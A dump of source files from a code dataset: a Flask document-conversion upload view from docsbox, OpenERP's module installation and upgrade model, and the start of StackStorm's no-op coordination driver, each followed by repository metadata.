"name": "Python",
"bytes": "1816"
}
],
"symlink_target": ""
} |
import ujson
import datetime
from magic import Magic
from tempfile import NamedTemporaryFile
from flask import request
from flask_restful import Resource, abort
from docsbox import app, rq
from docsbox.docs.tasks import remove_file, process_document
class DocumentView(Resource):
def get(self, task_id):
"""
Returns information about task status.
"""
queue = rq.get_queue()
task = queue.fetch_job(task_id)
if task:
return {
"id": task.id,
"status": task.status,
"result_url": task.result
}
else:
return abort(404, message="Unknown task_id")
class DocumentCreateView(Resource):
def post(self):
"""
        Receives file and options, checks file mimetype,
validates options and creates converting task
"""
if "file" not in request.files:
return abort(400, message="file field is required")
else:
with NamedTemporaryFile(delete=False, prefix=app.config["MEDIA_PATH"]) as tmp_file:
request.files["file"].save(tmp_file)
tmp_file.flush()
tmp_file.close()
remove_file.schedule(
datetime.timedelta(seconds=app.config["ORIGINAL_FILE_TTL"])
, tmp_file.name)
with Magic() as magic: # detect mimetype
mimetype = magic.from_file(tmp_file.name)
if mimetype not in app.config["SUPPORTED_MIMETYPES"]:
return abort(400, message="Not supported mimetype: '{0}'".format(mimetype))
options = request.form.get("options", None)
if options: # options validation
options = ujson.loads(options)
formats = options.get("formats", None)
if not isinstance(formats, list) or not formats:
return abort(400, message="Invalid 'formats' value")
else:
for fmt in formats:
supported = (fmt in app.config["SUPPORTED_MIMETYPES"][mimetype]["formats"])
if not supported:
message = "'{0}' mimetype can't be converted to '{1}'"
return abort(400, message=message.format(mimetype, fmt))
thumbnails = options.get("thumbnails", None)
if thumbnails:
if not isinstance(thumbnails, dict):
return abort(400, message="Invalid 'thumbnails' value")
else:
thumbnails_size = thumbnails.get("size", None)
if not isinstance(thumbnails_size, str) or not thumbnails_size:
return abort(400, message="Invalid 'size' value")
else:
try:
(width, height) = map(int, thumbnails_size.split("x"))
except ValueError:
return abort(400, message="Invalid 'size' value")
else:
options["thumbnails"]["size"] = (width, height)
else:
if mimetype == "application/pdf":
options = {
"formats": ["html"]
}
else:
options = app.config["DEFAULT_OPTIONS"]
task = process_document.queue(tmp_file.name, options, {
"mimetype": mimetype,
})
return {
"id": task.id,
"status": task.status,
}
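# Illustrative sketch, not part of the original module: what a client call
# against this view could look like. The host and route are assumptions, and
# the requested format must be allowed for the uploaded file's mimetype in
# SUPPORTED_MIMETYPES.
def _example_client_request_sketch():
    import requests
    with open("report.docx", "rb") as f:
        response = requests.post(
            "http://localhost:8000/documents",  # hypothetical route
            files={"file": f},
            data={"options": ujson.dumps({
                "formats": ["pdf"],
                "thumbnails": {"size": "320x240"},
            })},
        )
    return response.json()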
| {
"content_hash": "39ccb28d37f005a9027ad4c9dad13c24",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 103,
"avg_line_length": 41.56989247311828,
"alnum_prop": 0.4813760993274703,
"repo_name": "docsbox/docsbox",
"id": "87bbca0db647e6dffb2f20254ca8a278c1ac87f4",
"size": "3866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docsbox/docs/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15637"
}
],
"symlink_target": ""
} |
from docutils import nodes
from docutils.core import publish_string
from docutils.transforms import Transform, writer_aux
from docutils.writers.html4css1 import Writer
import imp
import logging
from operator import attrgetter
import os
import re
import shutil
import tempfile
import urllib
import urllib2
import urlparse
import zipfile
import zipimport
import lxml.html
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # NOQA
import openerp
import openerp.exceptions
from openerp import modules, tools
from openerp.modules.db import create_categories
from openerp.modules import get_module_resource
from openerp.tools.parse_version import parse_version
from openerp.tools.translate import _
from openerp.osv import osv, orm, fields
from openerp import api, fields as fields2
_logger = logging.getLogger(__name__)
ACTION_DICT = {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'base.module.upgrade',
'target': 'new',
'type': 'ir.actions.act_window',
'nodestroy': True,
}
def backup(path, raise_exception=True):
path = os.path.normpath(path)
if not os.path.exists(path):
if not raise_exception:
return None
raise OSError('path does not exists')
cnt = 1
while True:
bck = '%s~%d' % (path, cnt)
if not os.path.exists(bck):
shutil.move(path, bck)
return bck
cnt += 1
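# Illustrative sketch, not part of the original file: backup() moves the given
# path aside to "<path>~N" and returns the new location. The path below is
# hypothetical.
def _example_backup_sketch():
    bck = backup('/tmp/openerp-addons/my_module', raise_exception=False)
    return bck  # e.g. '/tmp/openerp-addons/my_module~1', or None if missing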
class module_category(osv.osv):
_name = "ir.module.category"
_description = "Application"
def _module_nbr(self, cr, uid, ids, prop, unknow_none, context):
cr.execute('SELECT category_id, COUNT(*) \
FROM ir_module_module \
WHERE category_id IN %(ids)s \
OR category_id IN (SELECT id \
FROM ir_module_category \
WHERE parent_id IN %(ids)s) \
GROUP BY category_id', {'ids': tuple(ids)}
)
result = dict(cr.fetchall())
for id in ids:
cr.execute('select id from ir_module_category where parent_id=%s', (id,))
result[id] = sum([result.get(c, 0) for (c,) in cr.fetchall()],
result.get(id, 0))
return result
_columns = {
'name': fields.char("Name", required=True, translate=True, select=True),
'parent_id': fields.many2one('ir.module.category', 'Parent Application', select=True),
'child_ids': fields.one2many('ir.module.category', 'parent_id', 'Child Applications'),
'module_nr': fields.function(_module_nbr, string='Number of Modules', type='integer'),
'module_ids': fields.one2many('ir.module.module', 'category_id', 'Modules'),
'description': fields.text("Description", translate=True),
'sequence': fields.integer('Sequence'),
'visible': fields.boolean('Visible'),
'xml_id': fields.function(osv.osv.get_external_id, type='char', string="External ID"),
}
_order = 'name'
_defaults = {
'visible': 1,
}
class MyFilterMessages(Transform):
"""
Custom docutils transform to remove `system message` for a document and
generate warnings.
(The standard filter removes them based on some `report_level` passed in
the `settings_override` dictionary, but if we use it, we can't see them
and generate warnings.)
"""
default_priority = 870
def apply(self):
for node in self.document.traverse(nodes.system_message):
_logger.warning("docutils' system message present: %s", str(node))
node.parent.remove(node)
class MyWriter(Writer):
"""
Custom docutils html4ccs1 writer that doesn't add the warnings to the
output document.
"""
def get_transforms(self):
return [MyFilterMessages, writer_aux.Admonitions]
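# Illustrative sketch, not part of the original file: MyWriter is meant to be
# handed to docutils' publish_string, as done further down in
# module._get_desc(); the overrides mirror the ones used there.
def _example_render_description_sketch(rst_text):
    overrides = {
        'embed_stylesheet': False,
        'doctitle_xform': False,
        'output_encoding': 'unicode',
        'xml_declaration': False,
    }
    return publish_string(source=rst_text or '', settings_overrides=overrides,
                          writer=MyWriter())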
class module(osv.osv):
_name = "ir.module.module"
_rec_name = "shortdesc"
_description = "Module"
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
res = super(module, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
result = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'action_server_module_immediate_install')[1]
if view_type == 'form':
if res.get('toolbar',False):
list = [rec for rec in res['toolbar']['action'] if rec.get('id', False) != result]
res['toolbar'] = {'action': list}
return res
@classmethod
def get_module_info(cls, name):
info = {}
try:
info = modules.load_information_from_description_file(name)
except Exception:
            _logger.debug('Error when trying to fetch information for '
'module %s', name, exc_info=True)
return info
def _get_desc(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = dict.fromkeys(ids, '')
for module in self.browse(cr, uid, ids, context=context):
path = get_module_resource(module.name, 'static/description/index.html')
if path:
with tools.file_open(path, 'rb') as desc_file:
doc = desc_file.read()
html = lxml.html.document_fromstring(doc)
for element, attribute, link, pos in html.iterlinks():
if element.get('src') and not '//' in element.get('src') and not 'static/' in element.get('src'):
element.set('src', "/%s/static/description/%s" % (module.name, element.get('src')))
res[module.id] = lxml.html.tostring(html)
else:
overrides = {
'embed_stylesheet': False,
'doctitle_xform': False,
'output_encoding': 'unicode',
'xml_declaration': False,
}
output = publish_string(source=module.description or '', settings_overrides=overrides, writer=MyWriter())
res[module.id] = output
return res
def _get_latest_version(self, cr, uid, ids, field_name=None, arg=None, context=None):
default_version = modules.adapt_version('1.0')
res = dict.fromkeys(ids, default_version)
for m in self.browse(cr, uid, ids):
res[m.id] = self.get_module_info(m.name).get('version', default_version)
return res
def _get_views(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = {}
model_data_obj = self.pool.get('ir.model.data')
dmodels = []
if field_name is None or 'views_by_module' in field_name:
dmodels.append('ir.ui.view')
if field_name is None or 'reports_by_module' in field_name:
dmodels.append('ir.actions.report.xml')
if field_name is None or 'menus_by_module' in field_name:
dmodels.append('ir.ui.menu')
assert dmodels, "no models for %s" % field_name
for module_rec in self.browse(cr, uid, ids, context=context):
res_mod_dic = res[module_rec.id] = {
'menus_by_module': [],
'reports_by_module': [],
'views_by_module': []
}
# Skip uninstalled modules below, no data to find anyway.
if module_rec.state not in ('installed', 'to upgrade', 'to remove'):
continue
# then, search and group ir.model.data records
imd_models = dict([(m, []) for m in dmodels])
imd_ids = model_data_obj.search(cr, uid, [
('module', '=', module_rec.name),
('model', 'in', tuple(dmodels))
])
for imd_res in model_data_obj.read(cr, uid, imd_ids, ['model', 'res_id'], context=context):
imd_models[imd_res['model']].append(imd_res['res_id'])
def browse(model):
M = self.pool[model]
# as this method is called before the module update, some xmlid may be invalid at this stage
                # explicitly filter records before reading them
ids = M.exists(cr, uid, imd_models.get(model, []), context)
return M.browse(cr, uid, ids, context)
def format_view(v):
aa = v.inherit_id and '* INHERIT ' or ''
return '%s%s (%s)' % (aa, v.name, v.type)
res_mod_dic['views_by_module'] = map(format_view, browse('ir.ui.view'))
res_mod_dic['reports_by_module'] = map(attrgetter('name'), browse('ir.actions.report.xml'))
res_mod_dic['menus_by_module'] = map(attrgetter('complete_name'), browse('ir.ui.menu'))
for key in res.iterkeys():
for k, v in res[key].iteritems():
res[key][k] = "\n".join(sorted(v))
return res
def _get_icon_image(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = dict.fromkeys(ids, '')
for module in self.browse(cr, uid, ids, context=context):
path = get_module_resource(module.name, 'static', 'description', 'icon.png')
if path:
image_file = tools.file_open(path, 'rb')
try:
res[module.id] = image_file.read().encode('base64')
finally:
image_file.close()
return res
_columns = {
'name': fields.char("Technical Name", readonly=True, required=True, select=True),
'category_id': fields.many2one('ir.module.category', 'Category', readonly=True, select=True),
'shortdesc': fields.char('Module Name', readonly=True, translate=True),
'summary': fields.char('Summary', readonly=True, translate=True),
'description': fields.text("Description", readonly=True, translate=True),
'description_html': fields.function(_get_desc, string='Description HTML', type='html', method=True, readonly=True),
'author': fields.char("Author", readonly=True),
'maintainer': fields.char('Maintainer', readonly=True),
'contributors': fields.text('Contributors', readonly=True),
'website': fields.char("Website", readonly=True),
# attention: Incorrect field names !!
# installed_version refers the latest version (the one on disk)
# latest_version refers the installed version (the one in database)
# published_version refers the version available on the repository
'installed_version': fields.function(_get_latest_version, string='Latest Version', type='char'),
'latest_version': fields.char('Installed Version', readonly=True),
'published_version': fields.char('Published Version', readonly=True),
'url': fields.char('URL', readonly=True),
'sequence': fields.integer('Sequence'),
'dependencies_id': fields.one2many('ir.module.module.dependency', 'module_id', 'Dependencies', readonly=True),
'auto_install': fields.boolean('Automatic Installation',
help='An auto-installable module is automatically installed by the '
'system when all its dependencies are satisfied. '
'If the module has no dependency, it is always installed.'),
'state': fields.selection([
('uninstallable', 'Not Installable'),
('uninstalled', 'Not Installed'),
('installed', 'Installed'),
('to upgrade', 'To be upgraded'),
('to remove', 'To be removed'),
('to install', 'To be installed')
], string='Status', readonly=True, select=True),
'demo': fields.boolean('Demo Data', readonly=True),
'license': fields.selection([
('GPL-2', 'GPL Version 2'),
('GPL-2 or any later version', 'GPL-2 or later version'),
('GPL-3', 'GPL Version 3'),
('GPL-3 or any later version', 'GPL-3 or later version'),
('AGPL-3', 'Affero GPL-3'),
('Other OSI approved licence', 'Other OSI Approved Licence'),
('Other proprietary', 'Other Proprietary')
], string='License', readonly=True),
'menus_by_module': fields.function(_get_views, string='Menus', type='text', multi="meta", store=True),
'reports_by_module': fields.function(_get_views, string='Reports', type='text', multi="meta", store=True),
'views_by_module': fields.function(_get_views, string='Views', type='text', multi="meta", store=True),
'application': fields.boolean('Application', readonly=True),
'icon': fields.char('Icon URL'),
'icon_image': fields.function(_get_icon_image, string='Icon', type="binary"),
}
_defaults = {
'state': 'uninstalled',
'sequence': 100,
'demo': False,
'license': 'AGPL-3',
}
_order = 'sequence,name'
def _name_uniq_msg(self, cr, uid, ids, context=None):
return _('The name of the module must be unique !')
_sql_constraints = [
('name_uniq', 'UNIQUE (name)', _name_uniq_msg),
]
def unlink(self, cr, uid, ids, context=None):
if not ids:
return True
if isinstance(ids, (int, long)):
ids = [ids]
mod_names = []
for mod in self.read(cr, uid, ids, ['state', 'name'], context):
if mod['state'] in ('installed', 'to upgrade', 'to remove', 'to install'):
raise orm.except_orm(_('Error'), _('You try to remove a module that is installed or will be installed'))
mod_names.append(mod['name'])
#Removing the entry from ir_model_data
#ids_meta = self.pool.get('ir.model.data').search(cr, uid, [('name', '=', 'module_meta_information'), ('module', 'in', mod_names)])
#if ids_meta:
# self.pool.get('ir.model.data').unlink(cr, uid, ids_meta, context)
return super(module, self).unlink(cr, uid, ids, context=context)
@staticmethod
def _check_external_dependencies(terp):
depends = terp.get('external_dependencies')
if not depends:
return
for pydep in depends.get('python', []):
parts = pydep.split('.')
parts.reverse()
path = None
while parts:
part = parts.pop()
try:
_, path, _ = imp.find_module(part, path and [path] or None)
except ImportError:
raise ImportError('No module named %s' % (pydep,))
for binary in depends.get('bin', []):
if tools.find_in_path(binary) is None:
raise Exception('Unable to find %r in path' % (binary,))
@classmethod
def check_external_dependencies(cls, module_name, newstate='to install'):
terp = cls.get_module_info(module_name)
try:
cls._check_external_dependencies(terp)
except Exception, e:
if newstate == 'to install':
msg = _('Unable to install module "%s" because an external dependency is not met: %s')
elif newstate == 'to upgrade':
msg = _('Unable to upgrade module "%s" because an external dependency is not met: %s')
else:
msg = _('Unable to process module "%s" because an external dependency is not met: %s')
raise orm.except_orm(_('Error'), msg % (module_name, e.args[0]))
@api.multi
def state_update(self, newstate, states_to_update, level=100):
if level < 1:
raise orm.except_orm(_('Error'), _('Recursion error in modules dependencies !'))
# whether some modules are installed with demo data
demo = False
for module in self:
# determine dependency modules to update/others
update_mods, ready_mods = self.browse(), self.browse()
for dep in module.dependencies_id:
if dep.state == 'unknown':
raise orm.except_orm(_('Error'), _("You try to install module '%s' that depends on module '%s'.\nBut the latter module is not available in your system.") % (module.name, dep.name,))
if dep.depend_id.state == newstate:
ready_mods += dep.depend_id
else:
update_mods += dep.depend_id
# update dependency modules that require it, and determine demo for module
update_demo = update_mods.state_update(newstate, states_to_update, level=level-1)
module_demo = module.demo or update_demo or any(mod.demo for mod in ready_mods)
demo = demo or module_demo
# check dependencies and update module itself
self.check_external_dependencies(module.name, newstate)
if module.state in states_to_update:
module.write({'state': newstate, 'demo': module_demo})
return demo
def button_install(self, cr, uid, ids, context=None):
# Mark the given modules to be installed.
self.state_update(cr, uid, ids, 'to install', ['uninstalled'], context=context)
# Mark (recursively) the newly satisfied modules to also be installed
# Select all auto-installable (but not yet installed) modules.
domain = [('state', '=', 'uninstalled'), ('auto_install', '=', True)]
uninstalled_ids = self.search(cr, uid, domain, context=context)
uninstalled_modules = self.browse(cr, uid, uninstalled_ids, context=context)
# Keep those with:
# - all dependencies satisfied (installed or to be installed),
# - at least one dependency being 'to install'
satisfied_states = frozenset(('installed', 'to install', 'to upgrade'))
def all_depencies_satisfied(m):
states = set(d.state for d in m.dependencies_id)
return states.issubset(satisfied_states) and ('to install' in states)
to_install_modules = filter(all_depencies_satisfied, uninstalled_modules)
to_install_ids = map(lambda m: m.id, to_install_modules)
# Mark them to be installed.
if to_install_ids:
self.button_install(cr, uid, to_install_ids, context=context)
return dict(ACTION_DICT, name=_('Install'))
def button_immediate_install(self, cr, uid, ids, context=None):
""" Installs the selected module(s) immediately and fully,
returns the next res.config action to execute
:param ids: identifiers of the modules to install
:returns: next res.config item to execute
:rtype: dict[str, object]
"""
return self._button_immediate_function(cr, uid, ids, self.button_install, context=context)
def button_install_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'uninstalled', 'demo': False})
return True
def module_uninstall(self, cr, uid, ids, context=None):
"""Perform the various steps required to uninstall a module completely
including the deletion of all database structures created by the module:
tables, columns, constraints, etc."""
ir_model_data = self.pool.get('ir.model.data')
modules_to_remove = [m.name for m in self.browse(cr, uid, ids, context)]
ir_model_data._module_data_uninstall(cr, uid, modules_to_remove, context)
self.write(cr, uid, ids, {'state': 'uninstalled'})
return True
def downstream_dependencies(self, cr, uid, ids, known_dep_ids=None,
exclude_states=['uninstalled', 'uninstallable', 'to remove'],
context=None):
"""Return the ids of all modules that directly or indirectly depend
on the given module `ids`, and that satisfy the `exclude_states`
filter"""
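        # e.g. (hypothetical modules): if A depends on B, asking for the downstream
        # dependencies of B returns A, plus anything that in turn depends on A.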
if not ids:
return []
known_dep_ids = set(known_dep_ids or [])
cr.execute('''SELECT DISTINCT m.id
FROM
ir_module_module_dependency d
JOIN
ir_module_module m ON (d.module_id=m.id)
WHERE
d.name IN (SELECT name from ir_module_module where id in %s) AND
m.state NOT IN %s AND
m.id NOT IN %s ''',
(tuple(ids), tuple(exclude_states), tuple(known_dep_ids or ids)))
new_dep_ids = set([m[0] for m in cr.fetchall()])
missing_mod_ids = new_dep_ids - known_dep_ids
known_dep_ids |= new_dep_ids
if missing_mod_ids:
known_dep_ids |= set(self.downstream_dependencies(cr, uid, list(missing_mod_ids),
known_dep_ids, exclude_states, context))
return list(known_dep_ids)
def _button_immediate_function(self, cr, uid, ids, function, context=None):
function(cr, uid, ids, context=context)
cr.commit()
api.Environment.reset()
registry = openerp.modules.registry.RegistryManager.new(cr.dbname, update_module=True)
config = registry['res.config'].next(cr, uid, [], context=context) or {}
if config.get('type') not in ('ir.actions.act_window_close',):
return config
# reload the client; open the first available root menu
menu_obj = registry['ir.ui.menu']
menu_ids = menu_obj.search(cr, uid, [('parent_id', '=', False)], context=context)
return {
'type': 'ir.actions.client',
'tag': 'reload',
'params': {'menu_id': menu_ids and menu_ids[0] or False}
}
#TODO remove me in master, not called anymore
def button_immediate_uninstall(self, cr, uid, ids, context=None):
"""
Uninstall the selected module(s) immediately and fully,
returns the next res.config action to execute
"""
return self._button_immediate_function(cr, uid, ids, self.button_uninstall, context=context)
def button_uninstall(self, cr, uid, ids, context=None):
if any(m.name == 'base' for m in self.browse(cr, uid, ids, context=context)):
raise orm.except_orm(_('Error'), _("The `base` module cannot be uninstalled"))
dep_ids = self.downstream_dependencies(cr, uid, ids, context=context)
self.write(cr, uid, ids + dep_ids, {'state': 'to remove'})
return dict(ACTION_DICT, name=_('Uninstall'))
def button_uninstall_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'installed'})
return True
def button_immediate_upgrade(self, cr, uid, ids, context=None):
"""
Upgrade the selected module(s) immediately and fully,
return the next res.config action to execute
"""
return self._button_immediate_function(cr, uid, ids, self.button_upgrade, context=context)
def button_upgrade(self, cr, uid, ids, context=None):
depobj = self.pool.get('ir.module.module.dependency')
todo = list(self.browse(cr, uid, ids, context=context))
self.update_list(cr, uid)
i = 0
while i < len(todo):
mod = todo[i]
i += 1
if mod.state not in ('installed', 'to upgrade'):
                raise orm.except_orm(_('Error'), _("Cannot upgrade module '%s'. It is not installed.") % (mod.name,))
self.check_external_dependencies(mod.name, 'to upgrade')
iids = depobj.search(cr, uid, [('name', '=', mod.name)], context=context)
for dep in depobj.browse(cr, uid, iids, context=context):
if dep.module_id.state == 'installed' and dep.module_id not in todo:
todo.append(dep.module_id)
ids = map(lambda x: x.id, todo)
self.write(cr, uid, ids, {'state': 'to upgrade'}, context=context)
to_install = []
for mod in todo:
for dep in mod.dependencies_id:
if dep.state == 'unknown':
                    raise orm.except_orm(_('Error'), _('You are trying to upgrade a module that depends on the module: %s.\nBut this module is not available in your system.') % (dep.name,))
if dep.state == 'uninstalled':
ids2 = self.search(cr, uid, [('name', '=', dep.name)])
to_install.extend(ids2)
self.button_install(cr, uid, to_install, context=context)
return dict(ACTION_DICT, name=_('Apply Schedule Upgrade'))
def button_upgrade_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'installed'})
return True
def button_update_translations(self, cr, uid, ids, context=None):
self.update_translations(cr, uid, ids)
return True
@staticmethod
def get_values_from_terp(terp):
return {
'description': terp.get('description', ''),
'shortdesc': terp.get('name', ''),
'author': terp.get('author', 'Unknown'),
'maintainer': terp.get('maintainer', False),
'contributors': ', '.join(terp.get('contributors', [])) or False,
'website': terp.get('website', ''),
'license': terp.get('license', 'AGPL-3'),
'sequence': terp.get('sequence', 100),
'application': terp.get('application', False),
'auto_install': terp.get('auto_install', False),
'icon': terp.get('icon', False),
'summary': terp.get('summary', ''),
}
def create(self, cr, uid, vals, context=None):
new_id = super(module, self).create(cr, uid, vals, context=context)
module_metadata = {
'name': 'module_%s' % vals['name'],
'model': 'ir.module.module',
'module': 'base',
'res_id': new_id,
'noupdate': True,
}
self.pool['ir.model.data'].create(cr, uid, module_metadata)
return new_id
# update the list of available packages
def update_list(self, cr, uid, context=None):
res = [0, 0] # [update, add]
default_version = modules.adapt_version('1.0')
known_mods = self.browse(cr, uid, self.search(cr, uid, []))
known_mods_names = dict([(m.name, m) for m in known_mods])
# iterate through detected modules and update/create them in db
for mod_name in modules.get_modules():
mod = known_mods_names.get(mod_name)
terp = self.get_module_info(mod_name)
values = self.get_values_from_terp(terp)
if mod:
updated_values = {}
for key in values:
old = getattr(mod, key)
updated = isinstance(values[key], basestring) and tools.ustr(values[key]) or values[key]
if (old or updated) and updated != old:
updated_values[key] = values[key]
if terp.get('installable', True) and mod.state == 'uninstallable':
updated_values['state'] = 'uninstalled'
if parse_version(terp.get('version', default_version)) > parse_version(mod.latest_version or default_version):
res[0] += 1
if updated_values:
self.write(cr, uid, mod.id, updated_values)
else:
mod_path = modules.get_module_path(mod_name)
if not mod_path:
continue
if not terp or not terp.get('installable', True):
continue
id = self.create(cr, uid, dict(name=mod_name, state='uninstalled', **values))
mod = self.browse(cr, uid, id)
res[1] += 1
self._update_dependencies(cr, uid, mod, terp.get('depends', []))
self._update_category(cr, uid, mod, terp.get('category', 'Uncategorized'))
        # Trigger load_addons if new modules have been discovered; load_addons exists on
        # wsgi handlers, so they can react accordingly
if tuple(res) != (0, 0):
for handler in openerp.service.wsgi_server.module_handlers:
if hasattr(handler, 'load_addons'):
handler.load_addons()
return res
def download(self, cr, uid, ids, download=True, context=None):
return []
def install_from_urls(self, cr, uid, urls, context=None):
if not self.pool['res.users'].has_group(cr, uid, 'base.group_system'):
raise openerp.exceptions.AccessDenied()
apps_server = urlparse.urlparse(self.get_apps_server(cr, uid, context=context))
OPENERP = 'openerp'
tmp = tempfile.mkdtemp()
_logger.debug('Install from url: %r', urls)
try:
# 1. Download & unzip missing modules
for module_name, url in urls.items():
if not url:
continue # nothing to download, local version is already the last one
up = urlparse.urlparse(url)
if up.scheme != apps_server.scheme or up.netloc != apps_server.netloc:
raise openerp.exceptions.AccessDenied()
try:
_logger.info('Downloading module `%s` from OpenERP Apps', module_name)
content = urllib2.urlopen(url).read()
except Exception:
_logger.exception('Failed to fetch module %s', module_name)
raise osv.except_osv(_('Module not found'),
_('The `%s` module appears to be unavailable at the moment, please try again later.') % module_name)
else:
zipfile.ZipFile(StringIO(content)).extractall(tmp)
assert os.path.isdir(os.path.join(tmp, module_name))
# 2a. Copy/Replace module source in addons path
for module_name, url in urls.items():
if module_name == OPENERP or not url:
continue # OPENERP is special case, handled below, and no URL means local module
module_path = modules.get_module_path(module_name, downloaded=True, display_warning=False)
bck = backup(module_path, False)
_logger.info('Copy downloaded module `%s` to `%s`', module_name, module_path)
shutil.move(os.path.join(tmp, module_name), module_path)
if bck:
shutil.rmtree(bck)
# 2b. Copy/Replace server+base module source if downloaded
if urls.get(OPENERP, None):
# special case. it contains the server and the base module.
# extract path is not the same
base_path = os.path.dirname(modules.get_module_path('base'))
# copy all modules in the SERVER/openerp/addons directory to the new "openerp" module (except base itself)
for d in os.listdir(base_path):
if d != 'base' and os.path.isdir(os.path.join(base_path, d)):
destdir = os.path.join(tmp, OPENERP, 'addons', d) # XXX 'openerp' subdirectory ?
shutil.copytree(os.path.join(base_path, d), destdir)
# then replace the server by the new "base" module
server_dir = openerp.tools.config['root_path'] # XXX or dirname()
bck = backup(server_dir)
_logger.info('Copy downloaded module `openerp` to `%s`', server_dir)
shutil.move(os.path.join(tmp, OPENERP), server_dir)
#if bck:
# shutil.rmtree(bck)
self.update_list(cr, uid, context=context)
with_urls = [m for m, u in urls.items() if u]
downloaded_ids = self.search(cr, uid, [('name', 'in', with_urls)], context=context)
already_installed = self.search(cr, uid, [('id', 'in', downloaded_ids), ('state', '=', 'installed')], context=context)
to_install_ids = self.search(cr, uid, [('name', 'in', urls.keys()), ('state', '=', 'uninstalled')], context=context)
post_install_action = self.button_immediate_install(cr, uid, to_install_ids, context=context)
if already_installed:
# in this case, force server restart to reload python code...
cr.commit()
openerp.service.server.restart()
return {
'type': 'ir.actions.client',
'tag': 'home',
'params': {'wait': True},
}
return post_install_action
finally:
shutil.rmtree(tmp)
def get_apps_server(self, cr, uid, context=None):
return tools.config.get('apps_server', 'https://apps.openerp.com/apps')
def _update_dependencies(self, cr, uid, mod_browse, depends=None):
if depends is None:
depends = []
existing = set(x.name for x in mod_browse.dependencies_id)
needed = set(depends)
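        # add rows for newly declared dependencies, drop rows that are no longer declared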
for dep in (needed - existing):
cr.execute('INSERT INTO ir_module_module_dependency (module_id, name) values (%s, %s)', (mod_browse.id, dep))
for dep in (existing - needed):
cr.execute('DELETE FROM ir_module_module_dependency WHERE module_id = %s and name = %s', (mod_browse.id, dep))
self.invalidate_cache(cr, uid, ['dependencies_id'], [mod_browse.id])
def _update_category(self, cr, uid, mod_browse, category='Uncategorized'):
current_category = mod_browse.category_id
current_category_path = []
while current_category:
current_category_path.insert(0, current_category.name)
current_category = current_category.parent_id
categs = category.split('/')
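        # e.g. a manifest category such as "Sales/CRM" (hypothetical) yields ['Sales', 'CRM'],
        # and the category chain is only re-created when it differs from the current one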
if categs != current_category_path:
cat_id = create_categories(cr, categs)
mod_browse.write({'category_id': cat_id})
def update_translations(self, cr, uid, ids, filter_lang=None, context=None):
if not filter_lang:
res_lang = self.pool.get('res.lang')
lang_ids = res_lang.search(cr, uid, [('translatable', '=', True)])
filter_lang = [lang.code for lang in res_lang.browse(cr, uid, lang_ids)]
elif not isinstance(filter_lang, (list, tuple)):
filter_lang = [filter_lang]
modules = [m.name for m in self.browse(cr, uid, ids) if m.state == 'installed']
self.pool.get('ir.translation').load_module_terms(cr, modules, filter_lang, context=context)
def check(self, cr, uid, ids, context=None):
for mod in self.browse(cr, uid, ids, context=context):
if not mod.description:
_logger.warning('module %s: description is empty !', mod.name)
DEP_STATES = [
('uninstallable', 'Uninstallable'),
('uninstalled', 'Not Installed'),
('installed', 'Installed'),
('to upgrade', 'To be upgraded'),
('to remove', 'To be removed'),
('to install', 'To be installed'),
('unknown', 'Unknown'),
]
class module_dependency(osv.Model):
_name = "ir.module.module.dependency"
_description = "Module dependency"
# the dependency name
name = fields2.Char(index=True)
# the module that depends on it
module_id = fields2.Many2one('ir.module.module', 'Module', ondelete='cascade')
# the module corresponding to the dependency, and its status
depend_id = fields2.Many2one('ir.module.module', 'Dependency', compute='_compute_depend')
state = fields2.Selection(DEP_STATES, string='Status', compute='_compute_state')
@api.multi
@api.depends('name')
def _compute_depend(self):
# retrieve all modules corresponding to the dependency names
names = list(set(dep.name for dep in self))
mods = self.env['ir.module.module'].search([('name', 'in', names)])
# index modules by name, and assign dependencies
name_mod = dict((mod.name, mod) for mod in mods)
for dep in self:
dep.depend_id = name_mod.get(dep.name)
@api.one
@api.depends('depend_id.state')
def _compute_state(self):
self.state = self.depend_id.state or 'unknown'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| {
"content_hash": "7d3d4831e8256a95ad1169e5bf9dba0f",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 201,
"avg_line_length": 45.100247524752476,
"alnum_prop": 0.5764111852034796,
"repo_name": "diogocs1/comps",
"id": "b327871c953ace5897304067bc610515dfb37a17",
"size": "37426",
"binary": false,
"copies": "29",
"ref": "refs/heads/master",
"path": "web/openerp/addons/base/module/module.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
} |
from oslo_config import cfg
from tooz import coordination
from tooz import locking
from st2common import log as logging
from st2common.util import system_info
LOG = logging.getLogger(__name__)
COORDINATOR = None
__all__ = [
'configured',
'get_coordinator',
'coordinator_setup',
'coordinator_teardown'
]
class NoOpLock(locking.Lock):
def __init__(self, name='noop'):
super(NoOpLock, self).__init__(name=name)
def acquire(self, blocking=True):
return True
def release(self):
return True
def heartbeat(self):
return True
class NoOpDriver(coordination.CoordinationDriver):
"""
Tooz driver where each operation is a no-op.
This driver is used if coordination service is not configured.
"""
def __init__(self, member_id):
super(NoOpDriver, self).__init__(member_id)
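    # Most operations below simply return None (get_lock() hands back a NoOpLock),
    # so calling code can run unchanged when no real coordination backend is configured.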
